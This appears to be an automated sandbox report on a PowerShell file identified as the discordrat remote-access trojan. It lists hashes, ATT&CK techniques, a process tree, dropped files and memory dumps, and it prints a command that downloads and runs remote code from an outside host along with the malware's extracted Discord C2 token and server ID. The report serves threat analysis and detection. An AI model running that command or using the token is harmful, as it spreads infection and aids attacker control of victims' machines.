discordrat | 6f69db9e402c3ced09d2fffff59f5981515853395757dfc131967bd18b3c1689

Resubmissions

22-02-2025 22:46

250222-2p931a1ndm 10

22-02-2025 22:41

250222-2mjs2a1mhn 10

22-02-2025 21:12

250222-z15asazkfr 10

Analysis

max time kernel
10s
max time network
13s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250217-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
22-02-2025 21:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ClawGameTemp.ps1
Size

7KB
MD5

beab656dc763c45a35bf5833fae6349d
SHA1

15e66182eeb30ec6b1b8b37d083108b58e9457e1
SHA256

6f69db9e402c3ced09d2fffff59f5981515853395757dfc131967bd18b3c1689
SHA512

1743c0cfea6f09abbb5370baa2cad9bd3956d3c47c755c8ed4a7c6dd16d7e8df6fae670e60d93a182f97e1593770084a83613b78a6ea45997a2e2fcbb8113bf6
SSDEEP

192:oNQfEMxiPuj8JElIIxshDJ4J9yxWJrAikRhw1Qzf1dovaap0vo9vwvYvMqvUPPRs:/TiPGKiqwa7yXx/3

Score

10^/10

discordrat execution persistence rat rootkit stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTMzNDYzOTY4MTUwOTUyMzUyOQ.GKm08B.ABNGZNfi6vtmOyFyLPoQUZtHxEaRDGGRtNo4Ig
server_id
1342605266801131601

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat
Discordrat family
discordrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	400	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1572	COM Surrogate.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4384	powershell.exe
400	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
9	discord.com
12	discord.com
7	discord.com

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4384	powershell.exe
4384	powershell.exe
400	powershell.exe
400	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4384	powershell.exe
Token: SeDebugPrivilege	400	powershell.exe
Token: SeDebugPrivilege	1572	COM Surrogate.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4384 wrote to memory of 400	4384	powershell.exe	84
PID 4384 wrote to memory of 400	4384	powershell.exe	84
PID 400 wrote to memory of 1572	400	powershell.exe	86
PID 400 wrote to memory of 1572	400	powershell.exe	86

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ClawGameTemp.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command iex (iwr 'powershellhelper.pythonanywhere.com/sxn')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:400
- - C:\Users\Admin\464fa804-60ba-41b2-b6e0-d9931583a0ea\COM Surrogate.exe
    "C:\Users\Admin\464fa804-60ba-41b2-b6e0-d9931583a0ea\COM Surrogate.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\464fa804-60ba-41b2-b6e0-d9931583a0ea\COM Surrogate.exe

Filesize
78KB

MD5
d5c87df30f41b030611b3066ef0b0894

SHA1
25cd9854c0a1706a66fef119111f119bf50538f9

SHA256
e9ed5a5e8065263091199b9bb72295fc0e82779f0c7a9f1230f3622691672e1c

SHA512
7b30ea2219fa441cb4984356fa6dcf539dfd01b12ba24f28438109ed3f238ddf641c74792b1dec88d3e2ea5657654fc9dd5bfe001f1c1bc4888c993fdf5483dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
4521e67a3b03b060fde700c36d3b9297

SHA1
4a730cd86dc7a57ac001d59853dd500c1b83b4ab

SHA256
a72aa223a84c4fa011c8a2b0ef2475a83d5123de2cdfa6a7160231729e68383d

SHA512
90235850eef71c2f0921d04e6990147af9e76fec8ee49e12e6a5bab065ff0e63331a54be845026f17a7b1dd230ee94843099db4813c127c6bafb8cbaf59b753f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ff0738b653402964242ea18eb0556feb

SHA1
e3c7f5007ae0dac49899f5d74cb64f008b650822

SHA256
e7eff2e5902b154ef3628015f605c8c31428b3521327a0c282122d7c3ed8e6f8

SHA512
ec7acca2c8e4c4a6fb17deaca9493932c671e895014a9c291f399f1274304371c4c895ace0551f48497486b448802e91ee068088f15d73a05f3a0c2456d88e16

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i0mik0ig.vep.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/400-33-0x00007FFBEF7C0000-0x00007FFBF0282000-memory.dmp

Filesize
10.8MB

Download
memory/400-32-0x00007FFBEF7C0000-0x00007FFBF0282000-memory.dmp

Filesize
10.8MB

Download
memory/400-54-0x00007FFBEF7C0000-0x00007FFBF0282000-memory.dmp

Filesize
10.8MB

Download
memory/400-34-0x0000024DEC560000-0x0000024DECD06000-memory.dmp

Filesize
7.6MB

Download
memory/400-29-0x00007FFBEF7C0000-0x00007FFBF0282000-memory.dmp

Filesize
10.8MB

Download
memory/400-31-0x00007FFBEF7C0000-0x00007FFBF0282000-memory.dmp

Filesize
10.8MB

Download
memory/1572-50-0x000002D746670000-0x000002D746688000-memory.dmp

Filesize
96KB

Download
memory/1572-51-0x000002D760CE0000-0x000002D760EA2000-memory.dmp

Filesize
1.8MB

Download
memory/1572-52-0x000002D7614E0000-0x000002D761A08000-memory.dmp

Filesize
5.2MB

Download
memory/4384-11-0x00007FFBEF7C0000-0x00007FFBF0282000-memory.dmp

Filesize
10.8MB

Download
memory/4384-13-0x00007FFBEF7C0000-0x00007FFBF0282000-memory.dmp

Filesize
10.8MB

Download
memory/4384-0-0x00007FFBEF7C3000-0x00007FFBEF7C5000-memory.dmp

Filesize
8KB

Download
memory/4384-12-0x00007FFBEF7C0000-0x00007FFBF0282000-memory.dmp

Filesize
10.8MB

Download
memory/4384-1-0x000001F60BF00000-0x000001F60BF22000-memory.dmp

Filesize
136KB

Download
memory/4384-16-0x00007FFBEF7C0000-0x00007FFBF0282000-memory.dmp

Filesize
10.8MB

Download